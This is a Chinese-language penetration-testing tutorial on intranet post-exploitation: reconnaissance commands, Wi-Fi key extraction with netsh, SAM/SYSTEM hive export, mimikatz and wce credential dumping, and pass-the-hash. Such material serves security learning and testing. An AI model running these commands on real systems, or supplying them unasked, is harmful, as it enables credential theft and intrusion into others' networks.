标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-2682] 作者: hudie 发表于: [2020-05-26]
本文共 [340] 位读者顶过
0x01 内网信息收集[出自:jiwo.org]
1.内网基础信息: 1 内网网段信息:网段信息有助于我们对渗透的内网进行拓扑、分区。以拿下边界服务器为例,得到一定的控制权之后,一定要查看网卡信息,这样就收集到内部网络地址段的信息,进一步渗透,找到更多的内部网络地址。 2 内网大小:有助于我们了解整个公司的网络分布与组成,帮助我们寻找内网核心业务。
2.内网核心业务信息: 1 内网OA办公系统(大公司)、邮件服务器(大公司才有)、网络监控系统(一般都有)、财务应用系统、核心产品源码(对于IT公司,会架设自己的svn或者git服务器)
3.其他信息
1 系统管理员密码。 2 其他用户session,3389和ipc$连接记录,各用户回收站信息。 3 浏览器密码和浏览器cookie获取。 4 windows无线密码获取(利用netsh),数据库密码获取。 5 host文件获取和dns缓存信息收集等,可以查看DNS服务器的IP,如果是域,一般情况DNS服务器和域控是同一台!先定位出DNS服务器,再进行后面渗透。 6 杀软、补丁、进程、网络代理信息wpad信息(Web Proxy Auto-Discovery Protocol,是客户端通过DHCP或DNS协议探测代理服务器配置脚本url的一种方式),软件列表信息。 7 计划任务、帐号密码策略与锁定策略、共享文件夹、web服务器配置文件。 8 VPN历史密码等、TeamView密码等、启动项、iislog等。 9 常用的后渗透信息收集工具、PowerShell+各种内网渗透工具的使用。
0x02 内网实战(命令、工具及脚本) 1 win:whoami、net user、net user 用户名、 net accounts 2 linux:whoami、id、who、cat /etc/passwd、cat /etc/group
2.内网网络拓扑等信息 以下两条命令可以查看无线网络密码 1 netsh wlan show profiles 2 netsh wlan show profile name=“网络链接配置文件” key=clear
除此,常用的有ipconfig、nslookup等等
1 win:tasklist
2 linux: ps、 top
4.端口信息 1 win: netstat -ano 2 linux: netstat -ntulp 、ps -aux 5.补丁信息 1 win系统:systeminfo 2 wmic qfe list full 3 wmic qfe list full /format:htable>c:\hotfixes.html
第三条命令导出html到指定位置,浏览器打开效果如下
linux:看一下是否有samba服务,或者使用rpm -qa来查询安装了哪些软件包,有一些可以通过名字来判断出是补丁包。 6.本地用户习惯 1 c:\windows\SchedLgU.txt,如果未启动remote Storage Engine服务(win7和server03上都没找到此服务)和Task Scheduler服务,则不会记录。 2 c:\windows\Prefetch文件夹,里面记录着用户运行的程序列表。(已验证) 3 c:\Users\用户名\Recent文件夹,记录最近打开过的文件和文件夹(xp及server03是在c:\Documents and Settings\用户名\Recent) 4 查看收藏夹、文档目录等。
7.凭证收集 1 下载地址https://github.com/peewpw/Invoke-WCMDump 2 PS>Import-Module .\Invoke-WCMDump.ps1 3 PS>Invoke-WCMDump
1 vaultcmd命令(win系统自带),导出的不是明文密码,本人不会利用 2 列出保管库(vault)列表:vaultcmd /list 3 列出保管库(vault)概要,凭据名称和GUID:vaultcmd /listschem
1 其他命令:cmdkey /list 8.系统哈希或明文密码获取 1 最方便的方法是利用cmd执行reg save命令从注册表导出。 2 XP等系统的密码位数超过14时,会采用NTLM加密,小于14位是LM。win7等更高版本,应该是NTLM。 3 test:1003:E52CAC67419A9A22664345140A852F61:67A54E1C9058FCA16498061B96863248::: 4 注意被冒号隔断的两组长字符串,前面是LM hash,后面是NTLM hash,hash一般存在两个地方:sam文件(system文件也需要),NTDS.DIT文件,存在域控上对应域用户。
(1)mimikatz获取明文(一般会报毒) 要以管理员身份运行,一般用在桌面环境。如果是终端条件,使用能以系统管理员身份运行的程序去调用mimikatz,执行以下两条命令就OK. 1 privilege::debug 2 sekurlsa::logonpasswords
(2)注册表导出,本地分析(较安全准确) 1 win2000和XP需要先提权到system权限,server03开始,可以直接reg save,文件可能较大,效率低,但比较准确可靠。 2 reg save hklm\sam sam.hive(也可省略.hive,但二者有何区别暂不清楚) 3 reg save hklm\system system.hive
4 reg save hklm\security security.hive(这个文件什么用途暂不清楚)
(3)Get-PassHashes脚本
(4)wce读取明文,哈希注入
1 抓取明文(wce.exe -w,wce支持win系统绝大多数版本)
获取明文并保存 1 wce -o output.txt 2 type output.tx
wce的hash注入 2 wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c cmd.exe 配合上面提到的Get-PassHashes脚本,本地进行hash注入后,成功列出了目标机的文件。两个主机互测,一次成功了,但测试前没有尝试第二张图,不知是否是hash注入影响。攻守互换后,不成功。
当提示注入成功的时候,这时候键入net use命令并没有看到有连接,其实已经可以连接了,直接使用ipc命令操作对方的机器就可以了。 1 wce.exe -s 用户名:域名:LM-HASH:NT-HASH
(5)procdump(微软出品)+本地用mimikatz得明文,较安全 1 详细参考:http://www.91ri.org/6881.html 2 原帖英文 :http://blog.gentilkiwi.com/securite/mimikatz/minidump
mimikatz1.0版本直接用不行(需要先注入sekurlsa.dll),2.1.1 x64版本试验OK,另外路径中最好不要出现中文,且需要以管理员权限运行。
9.星号查看
通过hook函数或者改变变量属性值来查看明文。
1 https://www.anquanke.com/post/id/85674
2 https://www.cnblogs.com/peterpan0707007/p/7495649.html
3 https://www.anquanke.com/post/id/85744
|